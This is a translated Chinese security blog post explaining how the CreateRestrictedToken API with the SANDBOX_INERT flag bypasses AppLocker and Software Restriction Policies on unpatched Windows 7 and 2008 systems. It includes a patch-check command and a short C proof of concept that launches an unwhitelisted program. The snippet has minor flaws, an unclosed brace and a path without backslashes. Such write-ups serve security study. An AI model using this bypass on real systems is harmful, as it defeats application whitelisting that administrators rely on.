回归最本质的信息安全

绕过AppLocker系列之CreateRestrictedToken的利用

2017年7月31日发布

12,022
0
0

导语:大多数时候,绕过AppLocker都会利用可信的Microsoft二进制文件或者配置错误的策略进行代码执行,这些方法都比较简单。

大多数时候,绕过AppLocker都会利用可信的Microsoft二进制文件或者配置错误的策略进行代码执行,这些方法都比较简单。但是,我们还有一种通过利用架构设计的漏洞来绕过SPR或AppLocker。特别是在Windows 7和Windows 2008 Server环境中,可以滥用API函数(CreateRestrictedToken)来实现绕过。微软后来发布了一个补丁来解决这个问题。

从命令提示符可以轻易的识别出是否缺少这个补丁:

wmic.exe qfe list | findstr.exe   2532445

无标题.png

AppLocker修补程序丢失

因为没有输出任何内容,所以这表示KB2532445补丁并没有安装。直接尝试执行不受信任的二进制文件就会因为AppLocker的限制而运行失败。

12.png

有一个由Michael Bailey开发的PowerShell 脚本,它通过使用SANDBOX_INERT标志来利用API函数CreateRestrictedToken,以便可以允许执行二进制文件。由于该标志禁用了所有规则集合的检查,因此可以绕过AppLocker和软件限制策略。这个漏洞最初是由Didier Stevens发现的,并且在他的博客中进行了完整的记录。

13.png

AppLocker Bypass – CreateRestrictedToken

为什么会发生这样的情况呢?让我们来看看 MSDN 是如何定义CreateRestrictedToken这个 API函数的。关于CreateRestrictedToken 函数的SANDBOX_INERT标志,MSDN 有如下描述:

如果使用此值,系统将不会检查AppLocker规则或应用软件限制策略。对于AppLocker,此标志将禁用所有这四个规则集的检查:可执行文件,Windows Installer,脚本和DLL。

在安装过程中创建必须运行提取的DLL的安装程序时,请在SaferComputeTokenFromLevel函数中使用SAFER_TOKEN_MAKE_INERT标志。

我写了一个小的应用程序来进行测试:

HANDLE hToken;
HANDLE hNewToken;
PROCESS_INFORMATION sPI;
STARTUPINFO sSI;
 
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
    if (CreateRestrictedToken(hToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &hNewToken))
    {
        memset(&sSI, 0, sizeof(sSI));
        sSI.cb = sizeof(sSI);
        if (CreateProcessAsUser(hNewToken, L"c:testDialog42.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &sSI, &sPI))
        {
            puts("process created");
        }
}

这个程序会启动另外一个程序——Dialog42.exe,我已经使用白名单配置了SRP,但是Dialog42.exe并不在白名单列表中:

1500896956246621.png

但是,当我在我的应用程序中使用SANDBOX_INERT标志启动Dialog42.exe时,就可以正常运行。

参考

https://blog.didierstevens.com/2011/01/25/circumventing-srp-and-applocker-to-create-a-new-process-by-design/

https://support.microsoft.com/en-us/help/2532445/you-can-circumvent-applocker-rules-by-using-an-office-macro-on-a-compu

http://baileysoriginalirishtech.blogspot.co.uk/2015/06/applocker-schmapplocker.html

https://github.com/strictlymike/Invoke-SchmappLocker/blob/master/Invoke-SchmappLocker.ps1

本文翻译自:https://pentestlab.blog/2017/07/07/applocker-bypass-createrestrictedtoken/ ,如若转载,请注明来源于嘶吼: http://www.4hou.com/technology/6810.html

点赞 0
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

丝绸之路

丝绸之路

嘶吼认证-特约作者/译者

发私信

发表评论